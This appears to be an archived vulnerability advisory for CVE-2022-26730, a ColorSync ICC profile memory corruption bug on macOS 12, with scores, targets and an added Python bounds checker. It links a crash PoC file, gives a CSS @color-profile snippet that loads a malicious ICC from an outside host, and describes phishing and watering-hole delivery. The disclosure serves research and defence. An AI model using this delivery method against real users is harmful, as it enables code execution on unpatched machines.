CVE-2022-26730 _ ColorSync

📅 [ Archival Date ]
Nov 7, 2022 5:47 PM
⚠️ [ ORIGIN SOURCE ]
🏷️ [ Tags ]
CVE-2022-26730, macOS
✍️ [ Author ]

srd.cx / Hoyt LLC

💣 [ PoC / Exploit ]

Executive Summary

A memory corruption issue existed in the processing of ICC profiles. This issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13. Processing a maliciously crafted image may lead to arbitrary code execution.

Patch Available for: Mac Studio (2022), Mac Pro (2019 and later), MacBook Air (2018 and later), MacBook Pro (2017 and later), Mac mini (2018 and later), iMac (2017 and later), MacBook (2017), and iMac Pro (2017).

A memory corruption issue existed in the processing of ICC profiles

https://support.apple.com/en-us/HT213488

NIST CVSS 3.x Severity and Metrics: 7.8 HIGH

Prior Art

Google Project Zero identified out-of-bounds reads due to integer overflows in curve table initialization, detailed in P0-2226 and assigned CVE-2021-30942.

The issue described in this report was found in the CMMLutTag::InitializeCurveTable method, as called by CMMLutTag::CMMLutTag during the initialization of A2B0/B2A0 tags of type mAB/mBA. The curve table consists of a number of curves of type ‘para’ (parametricCurveType) or ‘curv’ (curveType). The latter is represented in the color profile with the following structures (copied from https://www.color.org/icProfileHeader.h):

https://bugs.chromium.org/p/project-zero/issues/detail?id=2226

CVE-2022-26730

Overview: Found via PoC Replay of P0-2226 and disassembly of the Patch for CVE-2021-30942
  • Keywords: ICC Color Profile, User Controllable Input, Input Validation, Mac, PoC
  • Operating System: macOS 12
  • Vendor Notification: March 2022
  • Vendor Resolution: October 2022
  • Vendor Fix: This issue was addressed with improved input validation by Apple
  • Published: 10/31/2022
  • (Data Abort) byte read Translation fault
  • Bug Type: Incomplete Fix

CVE-2022-26730 curveType


CVE-2022-26730 Description: A memory corruption issue existed in the processing of ICC profiles of macOS 12.

Keywords: ICC Color Profile, User Controllable Input, Input Validation, Mac, PoC

As Google wrote, “curveType is represented in the color profile as defined in https://www.color.org/icProfileHeader.h”; tags such as ToA0Tag, AToB0Tag, A2B2, A2B1 and other Tags and their Sizes are easy to Fuzz programmatically.

ColorSync ICC Profile

[Image: Graphical View of a PoC ICC Color Profile for CVE-2022-26730 detailing the curveParameters using ColorSync]

The issue described in this Report for CVE-2022-26730 was found in the Tag ‘cprt’ and Data ‘mluc’ of the Multi-localized Strings Code. The Elements are Sources of User Controllable Input [UCI].

A Tainted Source of UCI flowed into a Sink, demonstrating that CVE-2022-26730 was a memory corruption issue in the processing of ICC profiles and that processing a maliciously crafted image may lead to arbitrary code execution.
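The bounds checks that a 'cprt' tag of type 'mluc' (and the tag table that points at it) need before any of its offsets are dereferenced, as an added illustration of the input validation this bug class calls for; this is not the page's PoC or Apple's fix. build_profile constructs a minimal synthetic profile for the checker to run on; all names are assumed.

```python
import struct

HDR = 128  # ICC header length; the tag count follows at offset 128

def _u32(buf, off):
    return struct.unpack_from(">I", buf, off)[0]

def check_mluc(tag: bytes, sig: str) -> list:
    """Bounds-check every record of a multiLocalizedUnicodeType ('mluc') tag."""
    if len(tag) < 16:
        return [f"{sig}: mluc header truncated"]
    nrec = _u32(tag, 8)
    if 16 + 12 * nrec > len(tag):
        return [f"{sig}: {nrec} records do not fit in {len(tag)} bytes"]
    out = []
    for r in range(nrec):
        # record r: lang(2) country(2) length(4) offset(4); offset is relative to tag start
        length, off = _u32(tag, 20 + 12 * r), _u32(tag, 24 + 12 * r)
        if off + length > len(tag) or length % 2:
            out.append(f"{sig}: record {r} offset {off} + len {length} out of bounds")
    return out

def validate_icc(data: bytes) -> list:
    """Return findings (empty list = every tag and mluc record is in bounds)."""
    if len(data) < HDR + 4 or data[36:40] != b"acsp":
        return ["not an ICC profile or header truncated"]
    findings, count = [], _u32(data, HDR)
    if HDR + 4 + 12 * count > len(data):
        return [f"tag table of {count} entries exceeds file"]
    for i in range(count):
        ent = HDR + 4 + 12 * i
        sig = data[ent:ent + 4].decode("latin-1")
        off, size = _u32(data, ent + 4), _u32(data, ent + 8)
        if off + size > len(data):  # in C, off + size itself can wrap; check before adding
            findings.append(f"{sig}: offset {off} + size {size} out of bounds")
        elif data[off:off + 4] == b"mluc":
            findings += check_mluc(data[off:off + size], sig)
    return findings

def build_profile(rec_off: int, rec_len: int) -> bytes:
    """Constructed minimal profile: header + one 'cprt' tag of type 'mluc' (assumed layout)."""
    text = "PoC".encode("utf-16-be")  # 6 bytes placed at mluc offset 28
    mluc = b"mluc" + bytes(4) + struct.pack(">II", 1, 12)
    mluc += b"enUS" + struct.pack(">II", rec_len, rec_off) + text
    tag_off = HDR + 4 + 12
    body = struct.pack(">I", 1) + b"cprt" + struct.pack(">II", tag_off, len(mluc))
    header = struct.pack(">I", HDR + len(body) + len(mluc)).ljust(36, b"\0") + b"acsp"
    return header.ljust(HDR, b"\0") + body + mluc
```

A record whose offset or length points past the end of its own tag is exactly the kind of value a parser must reject rather than read through.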

Functional PoCs for CVE-2022-26730 may be released at a future point in time due to the lack of protection for consumers not using macOS 13 and the availability of Prior Art to begin Exploit Development.

The Public Domain PoC Released today is a hand rolled ICC to Crash ColorSync [macOS 12] on a Null Byte Read at PoC URL https://xss.cx/2022/11/05/icc/Crash-CoreFoundation-CFDataGetLength-ColorSync-Crash-PoC-hand-crafted-to-hit-null-page-0x00-public-domain.icc.zip

CVE-2022-26730 Targets

  • (1) ColorSync, Safari, Finder, Instruments and other Applications consuming ICC Profiles or Graphics Files with embedded ICC Profile on macOS 12
  • (2) Apple Developer Instruments programs had additional memory corruption issues addressed in macOS 13 as a Result of CVE-2022-2630

CVE-2022-26730 PNG Fuzzing Exploit Container

CVE-2022-26730 PNG Fuzzing Container PoC

CVE-2022-26730 Attack Styles

Watering Hole, Spear Phishing, Email Bomb, Cross Site Scripting, Other

CVE-2022-26730 Use Case

Case #1: Attacker hand rolls an ICC Color Profile named bad.icc, embeds it in good.png and campaigns it

Case #2: Attacker crafts an HTML File with a Reference to the Malicious ICC or Graphics Picture and campaigns it

CVE-2022-26730 HTML Exploit Delivery Container

PoC Download

@media (color-gamut: p2) {
  @color-profile { name: p3; src: url(hxxps://xss.cx/..path.part../icc/cve-2022-26730-arbitrary-code-execution-user-controllable-input-poc-1.icc); }
}

Reporter CVSS v3.1 Vector Pro Forma for HTML Exploit Delivery: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C/CR:H/IR:H/AR:H/MAV:N/MAC:H/MPR:N/MUI:R/MS:C/MC:H/MI:H/MA:H

  • CVSS 3.1 Base Score: 8.8
  • Impact Subscore: 5.9
  • Exploitability Subscore: 2.8
  • CVSS Temporal Score: 8.4
  • CVSS Environmental Score: 8.0
  • Modified Impact Subscore: 6.1
  • Overall CVSS 3.1 Score: 8.0

Crash Reports

CVE-2022-26730 | X86_64 SIGBUS Crash leaks ColorSync | macOS 12

CVE-2022-26730 | X86_64 SIGBUS Crash malloc_history ColorSync | macOS 12

Knowledgebase

https://bugs.chromium.org/p/project-zero/issues/detail?id=2226

Issue 2226: Apple ColorSync: out-of-bounds reads due to integer overflows in curve table initialization

https://bugs.chromium.org/p/project-zero/issues/detail?id=2225

Issue 2225: Apple ColorSync: use of uninitialized memory in CMMNDimLinear::Interpolate

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26730

https://nvd.nist.gov/vuln/detail/CVE-2022-26730